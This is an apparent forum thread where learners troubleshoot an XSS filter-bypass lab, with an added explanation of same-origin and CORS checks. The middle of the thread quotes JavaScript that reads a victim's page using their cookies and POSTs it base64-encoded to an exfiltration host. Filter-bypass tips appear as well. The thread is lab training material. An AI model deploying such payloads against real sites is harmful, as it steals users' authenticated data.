I’m currently pretty stuck on working through the XSS Filter Bypasses section. I have found a bypass that works on the vulnerablesite.htb page, and confirmed that I can reference out to the exploitserver.htb page by putting alert(1)
there, but I can’t get the data exfiltration script to work. I’m not sure what I’m doing wrong here, I try setting it to exfiltrate the home.php page like in the other sections, but I see nothing come up in the log server.
Odd, I keep getting a “Cross-Origin Request Blocked: The Same Origin Policy disallows reading the remote resource at http://vulnerablesite.htb/home.php. (Reason: CORS header ‘Access-Control-Allow-Origin’ missing). Status code: 200.” error in DevTools even though it’s not cross origin. Tried including the port number too. Just using a page (i.e., /home.php) in the XHR request gives a “Malformed URI” error in DevTools. This one is not like the previous sections at all.
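The error quoted above is the browser enforcing the Same-Origin Policy: an origin is the tuple (scheme, host, port), and a script may read a response from a different origin only when the server answers with an Access-Control-Allow-Origin header that names the page's origin (with Access-Control-Allow-Credentials: true as well when cookies are sent; the wildcard `*` is never honoured for credentialed requests). The following is an added illustration, not code from the thread or from the lab; the function names `originOf`, `sameOrigin` and `responseReadable` and the sample URLs are my own constructions, and the logic is a simplified model of the browser's decision, not a full CORS implementation.

```javascript
// Added example: model the origin check a browser applies before letting a
// script read a cross-origin response. Uses only the standard URL class.
const DEFAULT_PORTS = { "http:": "80", "https:": "443" };

// Normalise a URL to its origin tuple, filling in the scheme's default port
// so that http://host and http://host:80 compare equal.
function originOf(urlString) {
  const u = new URL(urlString); // throws on a malformed URL
  const port = u.port || DEFAULT_PORTS[u.protocol] || "";
  return `${u.protocol}//${u.hostname}:${port}`;
}

function sameOrigin(a, b) {
  return originOf(a) === originOf(b);
}

// Can a script running in pageUrl read the body of a request to targetUrl?
// opts.acao             : value of the Access-Control-Allow-Origin header (null = header absent)
// opts.allowCredentials : whether Access-Control-Allow-Credentials: true was returned
// opts.withCredentials  : whether the request was made with cookies attached
function responseReadable(pageUrl, targetUrl, opts = {}) {
  const { acao = null, allowCredentials = false, withCredentials = false } = opts;
  if (sameOrigin(pageUrl, targetUrl)) return true;        // same origin: SOP satisfied, no CORS needed
  if (acao === null) return false;                         // the DevTools error above: ACAO header missing
  if (withCredentials && !allowCredentials) return false;  // cookies were sent; server must opt in explicitly
  if (acao === "*") return !withCredentials;               // wildcard is only valid without credentials
  try {
    return sameOrigin(acao, pageUrl);                      // header must name the page's exact origin
  } catch (e) {
    return false;                                          // e.g. the literal value "null"
  }
}

// Constructed scenarios using the hostnames from this thread.
function scenarios() {
  return {
    defaultPortIsSameOrigin: sameOrigin("http://vulnerablesite.htb/", "http://vulnerablesite.htb:80/home.php"),
    explicitPortIsDifferentOrigin: sameOrigin("http://exfiltrate.htb/", "http://exfiltrate.htb:8000/"),
    readFromOtherOriginNoCors: responseReadable("http://exploitserver.htb/", "http://vulnerablesite.htb/home.php"),
    wildcardWithCookies: responseReadable("http://exploitserver.htb/", "http://vulnerablesite.htb/home.php",
      { acao: "*", allowCredentials: true, withCredentials: true }),
    explicitOptIn: responseReadable("http://exploitserver.htb/", "http://vulnerablesite.htb/home.php",
      { acao: "http://exploitserver.htb", allowCredentials: true, withCredentials: true }),
  };
}

console.log(scenarios());
```

The two things this makes visible are that a port in the URL changes the origin (so http://exfiltrate.htb:PORT and http://exfiltrate.htb are not the same origin), and that a 200 response is still unreadable to script from another origin unless the target server has deliberately opted in via CORS; that is the protection the quoted error message is reporting.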
Looks like the exfil portion of the payload works fine (tested it by itself):
// Second request: forwards the body read by the first request (xhr.responseText) to the log server
var exfil = new XMLHttpRequest();
exfil.open('POST', 'http://exfiltrate.htb', false); // synchronous POST
exfil.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
exfil.send('r=' + btoa(xhr.responseText)); // xhr is the GET request from the first snippet
It does not like something with the initial XHR:
// First request: synchronous GET with cookies attached
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://vulnerablesite.htb', false);
xhr.withCredentials = true;
xhr.send();
I keep getting that error stated above on line two. It won’t take the URL parameter in the xhr.open for some reason.
xhr.open('GET', 'http://vulnerablesite.htb', false);
This is very annoying.
Hi. So, I have some issue with an unreachable /home.php in XMLHttpRequest. Has anyone solved this?
P.S. On my first try with the VM I got the home page for admin, but forgot to set withCredentials. And since that try, there is always a problem with reaching /home.php or even the full site address.
No luck still. I’ve actually found ANOTHER way to bypass the filter but the initial XHR in the payload still won’t work.
Anyone else having luck?
Try ideas for a simple XSS filter bypass from the cheat sheet. Or DM me to discuss details.
Passed. Need help - dm.
Solved it thanks to @OldCrazyCoder
Just keep it simple. It may take a lot of trial and error. Don’t deviate from the material in the section.
Hello everyone,
Completely blocked for 2 weeks.
I have absolutely tried everything in the CSRF/XSS section (double XMLHttpRequest, creating an image, registering another user, …) … but it is impossible to find how to access the admin info.
Bypassing the xss filter is easy by base64 encoding the payload and using an object tag.
Does anyone have some time to give me a clue or in which direction to look?
Thank you in advance
Olivier
Hi @OldCrazyCoder , @shroomies ,
I used payload
for this payload
but I cannot see the response. I see the hint " Due to the way the admin user accesses the page, please make sure not to use any port in URLs in your payload, i.e., use http://exfiltrate.htb/ instead of http://exfiltrate.htb:PORT/." but don’t understand how to configure it.
Please give a recommendation, thank you so much!
Hi,
You don’t have to configure it … simply use http://exfiltrate.htb/data= in your XMLHttpRequest in your payload.
Regards
Oli
Hi @ogaudel ,
I understand your opinion, but if the result is sent to http://exfiltrate.htb/data= in your XMLHttpRequest, then how can I see it, because I cannot access the URL http://exfiltrate.htb/data=?
If I configure the hosts file then I can access http://exfiltrate.htb:PORT/data=?, for example.
Please give your recommendation, thank you!
Hi … if you want to see exfiltrated data, check http://exfiltrate.htb/log …
Oli
Hi @ogaudel,
but when I add the hosts file entry, the content is like below:
94.237.59.199 vulnerablesite.htb exploitserver.htb exfiltrate.htb
and when accessing it using the browser I can only access http://exfiltrate.htb:PORT
so how can I access http://exfiltrate.htb/log … like you say?
Hic.
It should be http://exfiltrate.htb:PORT/log but it doesn’t map to the lab requirement.
Hi,
Don’t use the port with exfiltrate.htb in your payload (as the admin user can’t access exfiltrate.htb with a port).
In the browser, to test, open http://exfiltrate.htb:port/data=test … then go to http://exfiltrate.htb:port/log and you will see the request with your test.
But in the payloads for the admin user, don’t use the port!